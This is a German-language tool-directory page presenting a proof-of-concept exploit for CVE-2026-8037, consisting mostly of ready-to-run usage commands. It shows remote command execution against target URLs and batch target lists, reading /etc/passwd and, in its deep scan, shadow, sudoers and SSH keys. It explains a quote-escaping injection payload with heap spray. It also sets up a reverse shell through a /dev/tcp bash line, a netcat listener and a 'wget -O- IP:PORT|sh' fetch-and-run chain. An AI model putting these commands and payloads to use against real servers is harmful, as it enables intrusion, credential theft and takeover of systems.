Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-8037-POC — Enthält die Erkennung ausführbarer Befehle und Ein-Klick-Getshell (erfordert die Bereitstellung eines Dienstes auf dem Server) | Kitploit
Tools/GitHubGitHub/caster-chen/cve-2026-8037-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubcaster-chen/cve-2026-8037-poc

CVE-2026-8037-POC

Enthält die Erkennung ausführbarer Befehle und Ein-Klick-Getshell (erfordert die Bereitstellung eines Dienstes auf dem Server)

Repository anzeigen
3vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-8037-POC

Beinhaltet ausführbare Befehlserkennung und One-Click-Getshell (erfordert Serverbereitstellungsdienst) pco.yaml kann in Kombination mit nuclei schnell scannen

Schnellstart

Interaktiver Modus

root@kitploit:~
python go.py

Ziel-URL eingeben → Funktionsmenü auswählen.

Ziel scannen

root@kitploit:~
# Schneller Scan (8 grundlegende Informationen)
python go.py -t https://IP:PORT --probe fast

# Tiefer Scan (alle Befehle: 30+ Elemente)
python go.py -t https://IP:PORT --probe deep

# Batch-Scan
python go.py -f vulnerable_targets.txt --probe fast

Befehl ausführen

root@kitploit:~
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"

# Batch parallel (20 Threads)
python go.py -f targets.txt -c "hostname" --batch 20

One-Click Reverse Shell

Auf dem Angreifer zwei Terminals öffnen:

root@kitploit:~
# Terminal 1 - HTTP-Dienst (stellt rev.sh bereit)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087

# Terminal 2 - Warten auf Reverse Shell
nc -lvnp 8088

Dann Payload senden:

root@kitploit:~
# Einzelziel
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088

# Batch (seriell, nur einer nach dem anderen)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088

Das Skript druckt vor dem Senden die Vorbereitungsschritte.


Inhalt des Tiefen-Scans

KategorieBefehl
Grundlegende Informationenhostname, uname -a, kernel, OS release, uptime
Benutzerid, whoami, users/w/who
Netzwerkifconfig, route, arp, listening ports, connections, iptables
Systemprocesses, cpuinfo, meminfo, disk, mount
Dateienls / /root /tmp /home /etc
Konfigurationcrontab, passwd, shadow, sudoers, SSH keys
Erweiterungenconfig search, scripts, docker, containers

Injection-Prinzip

root@kitploit:~
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
 "g0":"AAAAAAAAAAAAAAAA'; <Befehl> #", ...}
  • apiuser="''''" löst den Fehler aus, dass escape_quotes() nicht mit null terminiert wird
  • g0~g60 Heap Spray 61 Mal, erhöht Erfolgsrate
  • '; <Befehl> # schließt Kontext, # kommentiert Rest

Längenbegrenzung

Ohne echo tag verfügbar 34 Zeichen:

root@kitploit:~
wget -O- IP:PORT|sh    (31 Zeichen)

Pipe-Kette: wget herunterladen → sh ausführen → bash Reverse Shell zurück zum angegebenen Port.


Parameterübersicht

ParameterFunktion
-t, --target URLZieladresse
-f, --file FILEZiellistendatei
-l, --lhost IPAngreifer-IP
-p, --lport PORTHTTP-Dienst-Port (Standard 8087)
-n, --ncport PORTnc-Listening-Port (Standard 8088)
-c, --cmd CMDBefehl ausführen
--probe fast/deepSchneller/Tiefer Scan
--batch NBatch-Parallelität (Standard seriell)
Tool herunterladen